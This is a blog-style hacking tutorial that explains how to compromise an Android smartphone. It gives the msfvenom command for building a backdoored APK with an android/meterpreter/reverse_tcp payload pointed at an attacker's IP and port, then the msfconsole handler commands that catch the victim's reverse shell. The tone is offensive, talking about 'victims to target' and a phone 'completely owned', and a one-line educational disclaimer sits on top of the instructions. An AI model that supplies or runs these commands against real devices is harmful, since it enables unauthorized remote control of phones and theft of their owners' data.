How to Hack Android Smartphone Using Metasploit

Hello friends how are you? I hope everything is going great  so what we will be talking about today is Hack Android Smartphone using Metasploit.

Important: All the details shown in the article are only for educational purposes and we are not responsible for any of your acts.

Why Hack Android Phones?

So the first question that comes to our mind after hearing this is why in the world we would like to hack Android Phones? The answer to that question is really simple majority of the people out there are Android users and you have a lot of victims to target 

But seriously don’t hack anyone’s device without their permission or you can get into a lot of trouble for doing android hacking.

What is Android?

According to Wikipedia:

ANDROID IS AN OPERATING SYSYTEM BASED ON LINUX KERNEL, AND DESIGNED PROMARILY FOR TOUCHCREEN MOBILE DEVICES SUCH AS SMARTPHONES AND TABLET COMPUTERS.

 INITIALLY DEVELOPED BY ANDROID, INC., WHICH GOOGLE BACKED FINANCIALLY AND LATER BOUGHT IN 2005, ANDROID WAS UNVEILED IN 2007 ALONG WITH THE FOUNDING OF THE OPEN HANDSET ALLIANCE: A CONSORTIUM OF HARDWARE, SOFTWARE, AND TELECOMMUNICATION COMPANIES DEVOTED TO ADVANCING OPEN STANDARDS FOR MOBILE DEVICES

What is Metasploit?

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby.

To put it in simple words it is an Open Source Framework, a tool for creating exploits for the remote victims and it also has a whole list of exploits readily available in Metasploit Framework.

It is the favorite tools for security researchers and ethical hackers to perform their attacks. It is super simple to create different payloads for different Operating Systems and platforms.

Metasploit for Android Hacking?

What method will be using to hack the phone? We are going to create Backdoor and install that on Victims Phone.

What is Backdoor?

A Backdoor is a method or a way of bypassing authentication in the product, computer etc. They are usually used for unauthorized access to a computer.

For Android, we are going to create an APK file with a backdoor in it. Android Application Package (APK) is the file format used to distribute and install application software onto the Google’s Android OS. It is similar to the MSI package or a Deb package in Linux based operating system.

Requirements:-

1. Metasploit Framework (Pre-Installed on Kali Linux)
2. Victims Android Smartphone (Unfortunately that is my phone)

Steps To Hack Android SmartPhone Using Metasploit:

So now lets get into it.

1. Open Terminal.
2. We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
3. Use this command to generate the exploit/Backdoor for the victim.

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

Let me explain the above Command so we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system. LHOST defines the attackers IP address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable.

Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.

So now we need to set up a handler to handle incoming connections to the port let’s do it.

root@kali:~/# msfconsole

use exploit/multi/handler set payload android/meterpreter/reverse_tcp

Now we will see any open connections, on attacker’s device.

set lhost 192.168.1.104 set lport 4444 exploit 

Remember that the LHOST & LPORT are going to be the attacker IP address and port to listen to the reverse connection. and exploit to start listening.

Now as soon as the attacker installs the APK exploit/backdoor you will get the reverse meterpreter session on you terminal like this.

Here we have some information that we have extracted from the Android system so the victim’s phone have been completely owned.

Finally, The successful hack dance    

So after all this explain what we have learned is never install apps from unknown sources  or else you are completely screwed :3

As a result, If you still have any confusions or any problem, you can check the video tutorial.

Do you like the tutorial on Hack Android Smartphone using Metasploit? Share this article with your friends.